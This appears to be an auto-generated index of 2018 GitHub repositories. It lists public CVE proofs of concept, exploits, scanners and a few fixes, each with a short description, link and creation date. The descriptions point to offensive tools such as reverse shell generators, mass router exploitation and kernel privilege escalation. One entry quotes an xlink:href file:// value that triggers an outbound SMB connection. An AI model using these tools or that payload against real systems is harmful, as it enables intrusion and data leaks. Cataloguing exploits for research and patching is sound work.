**no description** : [PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow](https://github.com/PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow) create time: 2018-07-25T23:31:21Z

**no description** : [YanZiShuang/CVE-2018-6546](https://github.com/YanZiShuang/CVE-2018-6546) create time: 2018-07-25T10:22:53Z

**no description** : [pudding2/CVE-2018-14083](https://github.com/pudding2/CVE-2018-14083) create time: 2018-07-24T02:36:08Z

**CVE-2013-6117** : [milo2012/CVE-2013-6117](https://github.com/milo2012/CVE-2013-6117) create time: 2018-07-23T14:56:03Z

**DLL Hijacking in Quickheal Total Security/ Internet Security/ Antivirus Pro (Installers)** : [kernelm0de/CVE-2018-8090](https://github.com/kernelm0de/CVE-2018-8090) create time: 2018-07-23T07:17:07Z

**CVE-2018-2893-PoC** : [pyn3rd/CVE-2018-2893](https://github.com/pyn3rd/CVE-2018-2893) create time: 2018-07-22T01:15:58Z

**This Python 3 script is for uploading shell (and other files) to Windows Server / Linux via Oracle 11g R2 (CVE-2010-3600).** : [LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2](https://github.com/LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2) create time: 2018-07-20T15:27:54Z

**反弹shell生成器** : [bigsizeme/CVE-2018-2893](https://github.com/bigsizeme/CVE-2018-2893) create time: 2018-07-20T07:26:43Z

**CVE-2018-2894 WebLogic Unrestricted File Upload Lead To RCE Check Script** : [LandGrey/CVE-2018-2894](https://github.com/LandGrey/CVE-2018-2894) create time: 2018-07-20T03:59:18Z

**cve-2018-2894 不同别人的利用方法。** : [111ddea/cve-2018-2894](https://github.com/111ddea/cve-2018-2894) create time: 2018-07-19T15:50:35Z

**CVE-2018-2893 PoC** : [ryanInf/CVE-2018-2893](https://github.com/ryanInf/CVE-2018-2893) create time: 2018-07-19T06:28:12Z

**CVE-2018-2893** : [sry309/CVE-2018-2893](https://github.com/sry309/CVE-2018-2893) create time: 2018-07-19T06:06:10Z

**no description** : [likescam/CVE-2018-4121](https://github.com/likescam/CVE-2018-4121) create time: 2018-07-17T16:15:29Z

**no description** : [likescam/CVE-2017-0478](https://github.com/likescam/CVE-2017-0478) create time: 2018-07-17T16:01:13Z

**no description** : [likescam/CVE-2017-0541](https://github.com/likescam/CVE-2017-0541) create time: 2018-07-17T16:00:57Z

**no description** : [likescam/ShareDoc_cve-2015-5477](https://github.com/likescam/ShareDoc_cve-2015-5477) create time: 2018-07-17T15:54:40Z

**Collection of exploits/POC for PrestaShop cookie vulnerabilities (CVE-2018-13784)** : [ambionics/prestashop-exploits](https://github.com/ambionics/prestashop-exploits) create time: 2018-07-16T16:33:41Z

**Automated Oracle CVE-2014-6577 exploitation via SQLi** : [SecurityArtWork/oracle-xxe-sqli](https://github.com/SecurityArtWork/oracle-xxe-sqli) create time: 2018-07-13T12:25:33Z

**no description** : [happynote3966/CVE-2018-7602](https://github.com/happynote3966/CVE-2018-7602) create time: 2018-07-12T05:08:14Z

**no description** : [happynote3966/CVE-2018-7600](https://github.com/happynote3966/CVE-2018-7600) create time: 2018-07-12T01:12:44Z

**Linux Null pointer dereference** : [jdvalentini/CVE-2009-2692](https://github.com/jdvalentini/CVE-2009-2692) create time: 2018-07-12T00:13:21Z

**no description** : [happynote3966/CVE-2014-3704](https://github.com/happynote3966/CVE-2014-3704) create time: 2018-07-11T16:05:32Z

**dd** : [EVOL4/CVE-2018-8120](https://github.com/EVOL4/CVE-2018-8120) create time: 2018-07-11T02:41:16Z

**Proof of concept for CVE-2016-4463** : [arntsonl/CVE-2016-4463](https://github.com/arntsonl/CVE-2016-4463) create time: 2018-07-10T21:10:35Z

**Analysis of VBS exploit CVE-2018-8174** : [piotrflorczyk/cve-2018-8174_analysis](https://github.com/piotrflorczyk/cve-2018-8174_analysis) create time: 2018-07-10T19:31:25Z

**XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 (0day CVE-2018-12463)** : [alt3kx/CVE-2018-12463](https://github.com/alt3kx/CVE-2018-12463) create time: 2018-07-10T09:51:40Z

**no description** : [lonehand/Oracle-WebLogic-CVE-2017-10271-master](https://github.com/lonehand/Oracle-WebLogic-CVE-2017-10271-master) create time: 2018-07-06T08:32:28Z

**Hotfix for file deletion to to code execution vulnerability in WordPress** : [bloom-ux/cve-2018-12895-hotfix](https://github.com/bloom-ux/cve-2018-12895-hotfix) create time: 2018-07-05T19:09:17Z

**no description** : [likescam/CVE-2018-2628](https://github.com/likescam/CVE-2018-2628) create time: 2018-07-02T09:00:34Z

**no description** : [thinkycx/CVE-2017-8890](https://github.com/thinkycx/CVE-2017-8890) create time: 2018-07-02T02:21:28Z

**no description** : [Aruthw/CVE-2014-6271](https://github.com/Aruthw/CVE-2014-6271) create time: 2018-06-30T13:26:20Z

**exploit camera with vuln cve-2018-9995 ( Novo, CeNova, QSee, Pulnix, XVR 5 in 1 (title: "XVR Login"), Securus, - Security. Never Compromise !! - Night OWL, DVR Login, HVR Login, MDVR Login )** : [shacojx/cve-2018-9995](https://github.com/shacojx/cve-2018-9995) create time: 2018-06-30T10:54:40Z

**no description** : [qy1202/https-github.com-Ridter-CVE-2017-11882-](https://github.com/qy1202/https-github.com-Ridter-CVE-2017-11882-) create time: 2018-06-28T12:35:53Z

**CVE-ID: CVE-2018-11450** : [LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability](https://github.com/LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability) create time: 2018-06-27T21:16:57Z

**Exploitable target to CVE-2017-5638** : [Iletee/struts2-rce](https://github.com/Iletee/struts2-rce) create time: 2018-06-26T10:21:50Z

**Rig Exploit for CVE-2018-8174 As with its previous campaigns, Rig’s Seamless campaign uses malvertising. In this case, the malvertisements have a hidden iframe that redirects victims to Rig’s landing page, which includes an exploit for CVE-2018-8174 and shellcode. This enables remote code execution of the shellcode obfuscated in the landing page. After successful exploitation, a second-stage downloader is retrieved, which appears to be a variant of SmokeLoader due to the URL. It would then download the final payload, a Monero miner.** : [orf53975/Rig-Exploit-for-CVE-2018-8174](https://github.com/orf53975/Rig-Exploit-for-CVE-2018-8174) create time: 2018-06-26T09:03:45Z

**no description** : [stevenlinfeng/CVE-2018-2628](https://github.com/stevenlinfeng/CVE-2018-2628) create time: 2018-06-26T08:25:57Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.1049. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Text Annotations. When setting the point attribute, the process does not properly validate the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.** : [t3rabyt3-zz/CVE-2018-9958--Exploit](https://github.com/t3rabyt3-zz/CVE-2018-9958--Exploit) create time: 2018-06-25T19:34:36Z

**no description** : [guwudoor/CVE-2018-8214](https://github.com/guwudoor/CVE-2018-8214) create time: 2018-06-25T13:43:58Z

**no description** : [leandrocamposcardoso/CVE-2017-5638-Mass-Exploit](https://github.com/leandrocamposcardoso/CVE-2017-5638-Mass-Exploit) create time: 2018-06-24T22:40:54Z

**Proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847)** : [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC) create time: 2018-06-24T05:34:05Z

**Cisco ASA - CVE-2018-0296 | Exploit** : [bhenner1/CVE-2018-0296](https://github.com/bhenner1/CVE-2018-0296) create time: 2018-06-22T21:12:58Z

**Script to test for Cisco ASA path traversal vulnerability (CVE-2018-0296) and extract system information.** : [yassineaboukir/CVE-2018-0296](https://github.com/yassineaboukir/CVE-2018-0296) create time: 2018-06-21T15:44:29Z

**Test CVE-2018-0296 and extract usernames** : [milo2012/CVE-2018-0296](https://github.com/milo2012/CVE-2018-0296) create time: 2018-06-21T08:36:34Z

**CVE-2018-12598** : [alt3kx/CVE-2018-12598](https://github.com/alt3kx/CVE-2018-12598) create time: 2018-06-21T06:59:46Z

**CVE-2018-12597** : [alt3kx/CVE-2018-12597](https://github.com/alt3kx/CVE-2018-12597) create time: 2018-06-21T06:55:39Z

**Ektron Content Management System (CMS) 9.20 SP2, remote re-enabling users (CVE-2018–12596)** : [alt3kx/CVE-2018-12596](https://github.com/alt3kx/CVE-2018-12596) create time: 2018-06-21T06:47:05Z

**CVE-2017-7529_PoC** : [en0f/CVE-2017-7529_PoC](https://github.com/en0f/CVE-2017-7529_PoC) create time: 2018-06-20T15:16:10Z

**MS15-034 HTTP.sys 远程执行代码检测脚本(MS15-034 HTTP.sys remote execution code poc script)** : [aedoo/CVE-2015-1635-POC](https://github.com/aedoo/CVE-2015-1635-POC) create time: 2018-06-20T14:28:11Z

**CVE-2017-5792** : [scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization](https://github.com/scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization) create time: 2018-06-20T06:08:47Z

**CVE-2016-2098 simple POC written in bash** : [its-arun/CVE-2016-2098](https://github.com/its-arun/CVE-2016-2098) create time: 2018-06-19T07:05:51Z

**no description** : [malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate](https://github.com/malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate) create time: 2018-06-19T02:19:26Z

**POC for TP-Link Archer C9 - Admin Password Reset and RCE (CVE-2017-11519)** : [vakzz/tplink-CVE-2017-11519](https://github.com/vakzz/tplink-CVE-2017-11519) create time: 2018-06-19T02:04:38Z

**Just a couple exploits for CVE-2018-11510** : [mefulton/CVE-2018-11510](https://github.com/mefulton/CVE-2018-11510) create time: 2018-06-18T23:49:41Z

**Shellshock vulnerability attacker** : [w4fz5uck5/ShockZaum-CVE-2014-6271](https://github.com/w4fz5uck5/ShockZaum-CVE-2014-6271) create time: 2018-06-18T16:09:15Z

**Demo-ing CVE-2017-1000253 in a container** : [RicterZ/PIE-Stack-Clash-CVE-2017-1000253](https://github.com/RicterZ/PIE-Stack-Clash-CVE-2017-1000253) create time: 2018-06-18T15:22:01Z

**CVE-2018-8120 POC** : [areuu/CVE-2018-8120](https://github.com/areuu/CVE-2018-8120) create time: 2018-06-16T09:40:27Z

**POC for CVE-2018-0824** : [codewhitesec/UnmarshalPwn](https://github.com/codewhitesec/UnmarshalPwn) create time: 2018-06-15T08:59:37Z

**MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) automation script.** : [w4fz5uck5/UDFPwn-CVE-2012-5613](https://github.com/w4fz5uck5/UDFPwn-CVE-2012-5613) create time: 2018-06-14T16:58:02Z

**empty_list - exploit for p0 issue 1564 (CVE-2018-4243) iOS 11.0 - 11.3.1 kernel r/w** : [Jailbreaks/empty_list](https://github.com/Jailbreaks/empty_list) create time: 2018-06-13T15:38:18Z

**BlackCat-CMS-Bundle-v1.3 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-10821** : [BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3](https://github.com/BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3) create time: 2018-06-13T14:52:34Z

**no description** : [SAPCNA/CVELIST_New2018](https://github.com/SAPCNA/CVELIST_New2018) create time: 2018-06-12T13:42:50Z

**CVE-2018-4878 flash 0day** : [ydl555/CVE-2018-4878](https://github.com/ydl555/CVE-2018-4878) create time: 2018-06-12T02:57:59Z

**Exploits CVE-2018-11235** : [H0K5/clone_and_pwn](https://github.com/H0K5/clone_and_pwn) create time: 2018-06-11T12:41:34Z

**Exploit for Red Hat / GlusterFS CVE-2018-1088 & CVE-2018-1112, featured @ DEFCON 26, Las Vegas!** : [MauroEldritch/GEVAUDAN](https://github.com/MauroEldritch/GEVAUDAN) create time: 2018-06-11T02:18:05Z

**A demonstration of how page tables can be used to run arbitrary code in ring-0 and lead to a privesc. Uses CVE-2016-7255 as an example.** : [yuvatia/page-table-exploitation](https://github.com/yuvatia/page-table-exploitation) create time: 2018-06-09T23:14:07Z

**no description** : [teawater/CVE-2017-5123](https://github.com/teawater/CVE-2017-5123) create time: 2018-06-08T06:07:01Z

**WordPress plugin for ImageTragick (CVE-2016–3714) proof of concept** : [artfreyr/wp-imagetragick](https://github.com/artfreyr/wp-imagetragick) create time: 2018-06-07T13:07:36Z

**CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7** : [alpha1ab/CVE-2018-8120](https://github.com/alpha1ab/CVE-2018-8120) create time: 2018-06-07T08:30:07Z

**CVE-2018-12031 | LFI in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.** : [EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion](https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion) create time: 2018-06-06T15:31:29Z

**Exploit for CVE-2018-10562** : [ATpiu/CVE-2018-10562](https://github.com/ATpiu/CVE-2018-10562) create time: 2018-06-06T09:43:40Z

**for git v2.7.4** : [Kiss-sh0t/CVE-2018-11235-poc](https://github.com/Kiss-sh0t/CVE-2018-11235-poc) create time: 2018-06-06T08:48:57Z

**CVE-2018-4241: XNU kernel heap overflow due to bad bounds checking in MPTCP for iOS 11 - 11.3.1released by Ian Beer** : [0neday/multi_path](https://github.com/0neday/multi_path) create time: 2018-06-06T00:07:01Z

**Buffer Overflow Vulnerability that can result ACE** : [u0pattern/CVE-2018-1000117-Exploit](https://github.com/u0pattern/CVE-2018-1000117-Exploit) create time: 2018-06-05T20:28:29Z

**Weblogic 反序列化漏洞(CVE-2018-2628)** : [jas502n/CVE-2018-2628](https://github.com/jas502n/CVE-2018-2628) create time: 2018-06-05T11:00:40Z

**no description** : [ne1llee/cve-2018-8120](https://github.com/ne1llee/cve-2018-8120) create time: 2018-06-05T03:12:52Z

**cve-2018-2628 反弹shell** : [wrysunny/cve-2018-2628](https://github.com/wrysunny/cve-2018-2628) create time: 2018-06-05T01:47:02Z

**CVE-2017-0806 PoC (Android GateKeeperResponse writeToParcel/createFromParcel mismatch)** : [michalbednarski/ReparcelBug](https://github.com/michalbednarski/ReparcelBug) create time: 2018-06-03T09:04:50Z

**MS Word MS WordPad via IE VBS Engine RCE** : [SyFi/CVE-2018-8174](https://github.com/SyFi/CVE-2018-8174) create time: 2018-06-01T22:12:54Z

**Proof of Concept** : [evilmiracle/CVE-2018-11236](https://github.com/evilmiracle/CVE-2018-11236) create time: 2018-06-01T03:05:42Z

**no description** : [CHYbeta/CVE-2018-11235-DEMO](https://github.com/CHYbeta/CVE-2018-11235-DEMO) create time: 2018-06-01T01:26:19Z

**Tools to exercise the Linux kernel mitigation for CVE-2018-3639 (aka Variant 4) using the Speculative Store Bypass Disable (SSBD) feature of x86 processors** : [tyhicks/ssbd-tools](https://github.com/tyhicks/ssbd-tools) create time: 2018-05-31T19:48:18Z

**M1 Band Smart Watch Bluetooth Low Energy Exploit python script (CVE-2018-11631)** : [xMagass/bandexploit](https://github.com/xMagass/bandexploit) create time: 2018-05-31T17:46:59Z

**no description** : [Choihosu/cve-2018-11235](https://github.com/Choihosu/cve-2018-11235) create time: 2018-05-31T13:29:06Z

**My version - [Win10 x64] CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass CVE-2018-6892** : [manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass) create time: 2018-05-31T09:44:07Z

**RCE vulnerability to exec "git clone --recurse-submodule" (CVE-2018-11235)** : [vmotos/CVE-2018-11235](https://github.com/vmotos/CVE-2018-11235) create time: 2018-05-31T08:38:17Z

**My version - CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass on Win7 x64 CVE-2018-6892** : [manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass) create time: 2018-05-31T03:25:02Z

**PoC exploit for CVE-2018-11235 allowing RCE on git clone --recurse-submodules** : [Rogdham/CVE-2018-11235](https://github.com/Rogdham/CVE-2018-11235) create time: 2018-05-30T22:56:29Z

**incomplete exploit for CVE-2018-4150 (by cmwdotme) for devices without SMAP** : [littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-](https://github.com/littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-) create time: 2018-05-30T14:29:37Z

**CVE-2018-8174_python** : [Yt1g3r/CVE-2018-8174_EXP](https://github.com/Yt1g3r/CVE-2018-8174_EXP) create time: 2018-05-30T03:12:32Z

**编译好的脏牛漏洞(CVE-2016-5195)EXP** : [Brucetg/DirtyCow-EXP](https://github.com/Brucetg/DirtyCow-EXP) create time: 2018-05-27T08:06:50Z

**CVE-2018-11517 | mySCADA myPRO v7.0.46 has another vulnerability to discover all projects in the system.** : [EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure](https://github.com/EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure) create time: 2018-05-26T15:49:07Z

**Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python.** : [c0ld1/GPON_RCE](https://github.com/c0ld1/GPON_RCE) create time: 2018-05-26T08:05:22Z

**Flexense HTTP Server <= 10.6.24 - Denial Of Service Exploit** : [EgeBalci/CVE-2018-8065](https://github.com/EgeBalci/CVE-2018-8065) create time: 2018-05-25T17:31:05Z

**no description** : [Jyozi/CVE-2018-7600](https://github.com/Jyozi/CVE-2018-7600) create time: 2018-05-25T06:19:05Z

**Detecion for the vulnerability CVE-2017-15944** : [surajraghuvanshi/PaloAltoRceDetectionAndExploit](https://github.com/surajraghuvanshi/PaloAltoRceDetectionAndExploit) create time: 2018-05-24T23:19:57Z

**no description** : [dangokyo/CVE_2017_16995](https://github.com/dangokyo/CVE_2017_16995) create time: 2018-05-24T13:11:42Z

**CVE-2018-8174 - VBScript memory corruption exploit.** : [0x09AL/CVE-2018-8174-msf](https://github.com/0x09AL/CVE-2018-8174-msf) create time: 2018-05-22T21:50:32Z

**Collection of "modchip" designs for launching payloads via the Tegra RCM bug (CVE-2018-6242)** : [reswitched/rcm-modchips](https://github.com/reswitched/rcm-modchips) create time: 2018-05-22T01:15:14Z

**no description** : [martinfrancois/CVE-2018-1000529](https://github.com/martinfrancois/CVE-2018-1000529) create time: 2018-05-21T23:43:18Z

**no description** : [s0wr0b1ndef/CVE-2018-2628](https://github.com/s0wr0b1ndef/CVE-2018-2628) create time: 2018-05-21T09:04:45Z

**no description** : [ahmetmanga/cve-2018-6574](https://github.com/ahmetmanga/cve-2018-6574) create time: 2018-05-20T20:32:15Z

**cve-2018-6574 @pentesterlab** : [ahmetmanga/go-get-rce](https://github.com/ahmetmanga/go-get-rce) create time: 2018-05-20T09:39:15Z

**My version - Easy File Sharing Web Server 7.2 - 'UserID' - Win 7 'DEP' bypass** : [manojcode/easy-file-share-7.2-exploit-CVE-2018-9059](https://github.com/manojcode/easy-file-share-7.2-exploit-CVE-2018-9059) create time: 2018-05-20T05:13:25Z

**CVE-2018-11311 | mySCADA myPRO 7 Hardcoded FTP Username and Password Vulnerability** : [EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password](https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password) create time: 2018-05-19T17:14:49Z

**CVE-2018-8120 Windows LPE exploit** : [unamer/CVE-2018-8120](https://github.com/unamer/CVE-2018-8120) create time: 2018-05-19T02:43:15Z

**CVE-2018-1111 DynoRoot** : [kkirsche/CVE-2018-1111](https://github.com/kkirsche/CVE-2018-1111) create time: 2018-05-18T13:27:43Z

**Exploit loader for Remote Code Execution w/ Payload on GPON Home Gateway devices (CVE-2018-10562) written in Python.** : [Choudai/GPON-LOADER](https://github.com/Choudai/GPON-LOADER) create time: 2018-05-17T22:03:47Z

**Environment for DynoRoot (CVE-2018-1111)** : [knqyf263/CVE-2018-1111](https://github.com/knqyf263/CVE-2018-1111) create time: 2018-05-17T09:37:19Z

**no description** : [bigric3/cve-2018-8120](https://github.com/bigric3/cve-2018-8120) create time: 2018-05-17T08:51:39Z

**Demo for CVE-2015-3837.** : [itibs/IsildursBane](https://github.com/itibs/IsildursBane) create time: 2018-05-17T08:47:48Z

**CVE-2018-6574 for pentesterLAB** : [willbo4r/go-get-rce](https://github.com/willbo4r/go-get-rce) create time: 2018-05-17T08:32:40Z

**Windows: heap overflow in jscript.dll in Array.sort** : [AV1080p/CVE-2017-11907](https://github.com/AV1080p/CVE-2017-11907) create time: 2018-05-16T05:42:39Z

**Exploit for Mass Remote Code Execution on GPON home routers (CVE-2018-10562) obtained from Shodan.** : [649/Pingpon-Exploit](https://github.com/649/Pingpon-Exploit) create time: 2018-05-15T17:31:21Z

**Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.** : [alt3kx/CVE-2002-0200](https://github.com/alt3kx/CVE-2002-0200) create time: 2018-05-14T21:09:20Z

**ISC INN 2.x - Command-Line Buffer Overflow** : [alt3kx/CVE-2001-1442](https://github.com/alt3kx/CVE-2001-1442) create time: 2018-05-14T20:36:10Z

**Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.** : [alt3kx/CVE-2001-0934](https://github.com/alt3kx/CVE-2001-0934) create time: 2018-05-14T19:53:05Z

**Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. "ls C:".** : [alt3kx/CVE-2001-0933](https://github.com/alt3kx/CVE-2001-0933) create time: 2018-05-14T19:23:46Z

**Directory traversal vulnerability in Cooolsoft PowerFTP Server 2.03 allows attackers to list or read arbitrary files and directories via a .. (dot dot) in (1) LS or (2) GET.** : [alt3kx/CVE-2001-0931](https://github.com/alt3kx/CVE-2001-0931) create time: 2018-05-14T19:08:03Z

**Arbitrary code execution with kernel privileges using CVE-2018-8897.** : [can1357/CVE-2018-8897](https://github.com/can1357/CVE-2018-8897) create time: 2018-05-13T19:34:17Z

**Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution - Shell Script** : [win3zz/CVE-2017-5638](https://github.com/win3zz/CVE-2017-5638) create time: 2018-05-13T16:13:26Z

**The exploitation for CVE-2018-8897** : [jiazhang0/pop-mov-ss-exploit](https://github.com/jiazhang0/pop-mov-ss-exploit) create time: 2018-05-13T09:05:07Z

**service.cgi in Cobalt RAQ 4 allows remote attackers to cause a denial of service** : [alt3kx/CVE-2002-0348](https://github.com/alt3kx/CVE-2002-0348) create time: 2018-05-11T13:59:36Z

**Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request.** : [alt3kx/CVE-2002-0347](https://github.com/alt3kx/CVE-2002-0347) create time: 2018-05-11T13:52:16Z

**Cross-site scripting vulnerability in Cobalt RAQ 4 allows remote attackers to execute arbitrary script as other Cobalt users via Javascript in a URL to (1) service.cgi or (2) alert.cgi.** : [alt3kx/CVE-2002-0346](https://github.com/alt3kx/CVE-2002-0346) create time: 2018-05-11T13:25:41Z

**Buffer overflows in the cifslogin command for HP CIFS/9000 Client A.01.06 and earlier** : [alt3kx/CVE-2002-0991](https://github.com/alt3kx/CVE-2002-0991) create time: 2018-05-11T12:35:57Z

**A fix for the batchOverflow bug https://medium.com/@peckshield/alert-new-batchoverflow-bug-in-multiple-erc20-smart-contracts-cve-2018-10299-511067db6536** : [phzietsman/batchOverflow](https://github.com/phzietsman/batchOverflow) create time: 2018-05-11T12:23:08Z

**SLRNPull Spool Directory Command Line Parameter Buffer Overflow Vulnerability** : [alt3kx/CVE-2002-0740](https://github.com/alt3kx/CVE-2002-0740) create time: 2018-05-11T09:38:29Z

**no description** : [gwolfs/CVE-2018-9995-ModifiedByGwolfs](https://github.com/gwolfs/CVE-2018-9995-ModifiedByGwolfs) create time: 2018-05-11T07:05:37Z

**Directory traversal vulnerability in Shambala 4.5** : [alt3kx/CVE-2001-0758](https://github.com/alt3kx/CVE-2001-0758) create time: 2018-05-11T02:47:18Z

**PHP remote file inclusion in main.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5** : [alt3kx/CVE-2007-3831](https://github.com/alt3kx/CVE-2007-3831) create time: 2018-05-11T02:02:21Z

**Directory traversal vulnerability in ftpd in QPC QVT/Net 4.0 and AVT/Term 5.0** : [alt3kx/CVE-2001-0680](https://github.com/alt3kx/CVE-2001-0680) create time: 2018-05-11T00:29:56Z

**Implements the POP/MOV SS (CVE-2018-8897) vulnerability by bugchecking the machine (local DoS).** : [nmulasmajic/CVE-2018-8897](https://github.com/nmulasmajic/CVE-2018-8897) create time: 2018-05-10T20:46:30Z

**a iOS CVE-2018-4150 Application example.** : [RPwnage/LovelySn0w](https://github.com/RPwnage/LovelySn0w) create time: 2018-05-10T15:04:44Z

**CVE-2017-7494 C poc** : [incredible1yu/CVE-2017-7494](https://github.com/incredible1yu/CVE-2017-7494) create time: 2018-05-10T08:12:31Z

**CVE-2018-4248: Out-of-bounds read in libxpc during string serialization.** : [bazad/xpc-string-leak](https://github.com/bazad/xpc-string-leak) create time: 2018-05-10T04:31:38Z

**DVR系列摄像头批量检测** : [Huangkey/CVE-2018-9995_check](https://github.com/Huangkey/CVE-2018-9995_check) create time: 2018-05-09T00:43:24Z

**no description** : [aquasecurity/scan-cve-2018-8115](https://github.com/aquasecurity/scan-cve-2018-8115) create time: 2018-05-08T20:24:23Z

**Proof of concept for CVE-2018-4150 by @cmwdotme** : [Jailbreaks/CVE-2018-4150](https://github.com/Jailbreaks/CVE-2018-4150) create time: 2018-05-08T16:12:59Z

**no description** : [hellowenying/CVE2018-0171](https://github.com/hellowenying/CVE2018-0171) create time: 2018-05-08T14:42:24Z

**CVE-2017-0411 PoC refered p0** : [lulusudoku/PoC](https://github.com/lulusudoku/PoC) create time: 2018-05-08T14:25:29Z

**CVE-2018-9995_Batch_scanning_exp** : [zzh217/CVE-2018-9995_Batch_scanning_exp](https://github.com/zzh217/CVE-2018-9995_Batch_scanning_exp) create time: 2018-05-08T12:07:26Z

**Fixed exploit for Nagios CVE-2018-8733, CVE-2018-8734, CVE-2018-8735, CVE-2018-8736 https://www.exploit-db.com/exploits/44560/** : [xfer0/Nagios-XI-5.2.6-9-5.3-5.4-Chained-Remote-Root-Exploit-Fixed](https://github.com/xfer0/Nagios-XI-5.2.6-9-5.3-5.4-Chained-Remote-Root-Exploit-Fixed) create time: 2018-05-07T19:55:36Z

**Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python. Initially disclosed by VPNMentor (https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/), kudos for their work.** : [f3d0x0/GPON](https://github.com/f3d0x0/GPON) create time: 2018-05-07T10:34:10Z

**Dataiku REST-API by default the software, allows anonymous access to functionality that allows an attacker to know valid users.** : [alt3kx/CVE-2018-10732](https://github.com/alt3kx/CVE-2018-10732) create time: 2018-05-07T09:07:58Z

**Authentication Bypass / Command Injection Exploit CVE-2018-1056** : [rotemkama/Gpon-Routers](https://github.com/rotemkama/Gpon-Routers) create time: 2018-05-07T08:52:45Z

**CS4238 Computer Security Practices** : [kowshik-sundararajan/CVE-2014-6271](https://github.com/kowshik-sundararajan/CVE-2014-6271) create time: 2018-05-05T05:50:50Z

**Empire Port of CVE-2017-11882** : [ChaitanyaHaritash/CVE-2017-11882](https://github.com/ChaitanyaHaritash/CVE-2017-11882) create time: 2018-05-04T17:50:57Z

**WP-DOS-Exploit-CVE-2018-6389** : [armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389](https://github.com/armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389) create time: 2018-05-04T05:15:33Z

**CVE-2018-10715** : [alt3kx/CVE-2018-10715](https://github.com/alt3kx/CVE-2018-10715) create time: 2018-05-04T01:33:22Z

**exploit of smt proxyoverflow bug, i.e. CVE-2018–10376** : [zhanlulab/Exploit_SMT_ProxyOverflow](https://github.com/zhanlulab/Exploit_SMT_ProxyOverflow) create time: 2018-05-03T13:49:03Z

**no description** : [dsfau/CVE-2018-1000199](https://github.com/dsfau/CVE-2018-1000199) create time: 2018-05-03T09:37:56Z

**no description** : [dsfau/CVE-2018-10546](https://github.com/dsfau/CVE-2018-10546) create time: 2018-05-03T09:35:27Z

**Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution implementation in Python** : [0xEval/cve-2015-3224](https://github.com/0xEval/cve-2015-3224) create time: 2018-05-03T07:41:33Z

**Some codes for bypassing Oracle WebLogic CVE-2018-2628 patch** : [tdy218/ysoserial-cve-2018-2628](https://github.com/tdy218/ysoserial-cve-2018-2628) create time: 2018-05-03T03:13:05Z

**An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by "xlink:href=file://192.168.0.2/test.jpg" within an "office:document-content" element in a ".odt XML document".** : [TaharAmine/CVE-2018-10583](https://github.com/TaharAmine/CVE-2018-10583) create time: 2018-05-03T00:34:08Z

**PoC exploit for CVE-2018-5234** : [embedi/ble_norton_core](https://github.com/embedi/ble_norton_core) create time: 2018-05-01T16:40:30Z

